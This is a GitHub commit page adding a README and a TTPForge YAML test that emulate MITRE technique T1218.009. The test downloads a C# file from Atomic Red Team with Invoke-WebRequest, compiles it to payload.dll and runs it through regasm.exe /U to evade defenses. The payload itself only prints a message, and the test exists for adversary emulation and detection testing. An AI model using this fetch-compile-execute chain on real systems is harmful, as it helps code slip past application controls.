-
Notifications
You must be signed in to change notification settings - Fork 26
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Browse files
Browse the repository at this point in the history
Summary: Pull Request resolved: #136 Converting atomics to ttps in Windows Atomic Red Team Tests This ttp was 10/10 and it performs the follow function: Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. Derived from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md#t1218009---signed-binary-proxy-execution-regsvcsregasm Reviewed By: godlovepenn Differential Revision: D62655872 fbshipit-source-id: 22e03966d9cd94814d096d502fa7aa06ea158fc9
- Loading branch information
1 parent
99c4217
commit e15c7f7
Showing
2 changed files
with
102 additions
and
0 deletions.
There are no files selected for viewing
43 changes: 43 additions & 0 deletions
43
ttps/defense-evasion/windows/signed-binary-proxy-regasm/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| # Regasm Uninstall Method Call Test | ||
|
|
||
|  | ||
|
|
||
| This TTP is designed to execute the Uninstall Method, No Admin Rights Required. Derived from [Atomic Red Team T1218.009](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md#t1218009---signed-binary-proxy-execution-regsvcsregasm) | ||
|
|
||
| Upon execution, "I shouldn't really execute either." will be displayed. | ||
|
|
||
|
|
||
| ## Arguments | ||
| - **src_file**: a string variable specifying the location of the CSharp file. Default is $PWD\src\T1218.009.cs | ||
|
|
||
| ## Pre-requisites | ||
| - Windows operating system equipped with powershell | ||
|
|
||
| ## Examples | ||
| You can run the TTP using the following example (after updating the arguments): | ||
| ```bash | ||
| ttpforge run forgearmory//defense-evasion/windows/signed-binary-proxy-regasm/signed-binary-proxy-regasm.yaml | ||
| ``` | ||
| ```bash | ||
| ttpforge run forgearmory//defense-evasion/windows/signed-binary-proxy-regasm/signed-binary-proxy-regasm.yaml --arg script\script.cs | ||
| ``` | ||
|
|
||
| ## Steps | ||
| 1. **execute** : Downloads CSharp file and executes by using Regasm for proxy execution of code | ||
| 2. **cleanup**: Removes the payload.dll file generated from execute and delete the downloaded CSharp file | ||
|
|
||
| ## Manual Reproduction | ||
| ```bash | ||
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"payload.dll" /target:library "src\T1218.009.cs" | ||
|
|
||
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll | ||
| ``` | ||
|
|
||
| ## MITRE ATT&CK Mapping | ||
|
|
||
| - **Tactics**: | ||
| - TA0005 Defense Evasion | ||
| - **Techniques**: | ||
| - T1218 System Binary Proxy Execution | ||
| - **Subtechniques**: | ||
| - T1218.009 Regsvcs/Regasm |
59 changes: 59 additions & 0 deletions
59
ttps/defense-evasion/windows/signed-binary-proxy-regasm/signed-binary-proxy-regasm.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,59 @@ | ||
| --- | ||
| api_version: 2.0 | ||
| uuid: 29bb4477-88e7-44e9-a6e8-21be79ff6ebc | ||
| name: Regasm Uninstall Method Call Test | ||
| description: | | ||
| Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. | ||
| Derived from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md#t1218009---signed-binary-proxy-execution-regsvcsregasm | ||
| requirements: | ||
| platforms: | ||
| - os: windows | ||
| mitre: | ||
| tactics: | ||
| - TA0005 Defense Evasion | ||
| techniques: | ||
| - T1218 System Binary Proxy Execution | ||
| subtechniques: | ||
| - T1218.009 Regsvcs/Regasm | ||
| args: | ||
| - name: src_file | ||
| description: location of the CSharp source file | ||
| type: string | ||
| default: $PWD\src\T1218.009.cs | ||
|
|
||
| steps: | ||
| - name: execute | ||
| executor: powershell | ||
| description: | | ||
| Compiles CSharp source file into payload.dll and un-registers payload.dll from the Windows Registry | ||
| inline: | | ||
| if (-Not (Test-Path {{.Args.src_file}})){ | ||
| Write-Host "T1218.009.cs not found. Downloading..." | ||
| $parent = Split-Path {{.Args.src_file}} -Parent | ||
| New-Item -Type Directory -Path $parent -ErrorAction Ignore | Out-Null | ||
| Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "{{.Args.src_file}}" | ||
| Write-Host "T1218.009.cs downloaded to: {{.Args.src_file}}" | ||
| } else { | ||
| Write-Host "T1218.009.cs located at: {{.Args.src_file}}" | ||
| } | ||
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"payload.dll" /target:library "{{.Args.src_file}}" | ||
| if (-Not (Test-Path "payload.dll")){ | ||
| Write-Error "The payload.dll file was not generated." | ||
| } else { | ||
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll | ||
| } | ||
| cleanup: | ||
| executor: powershell | ||
| inline: | | ||
| $parent = Split-Path {{.Args.src_file}} -Parent | ||
| if (Test-Path {{.Args.src_file}}){ | ||
| remove-item -r $parent | ||
| } else{ | ||
| Write-Host "Failed to remove $parent" | ||
| } | ||
| if (Test-Path "payload.dll"){ | ||
| remove-item payload.dll | ||
| } else { | ||
| Write-Host "Failed to remove payload.dll" | ||
| } |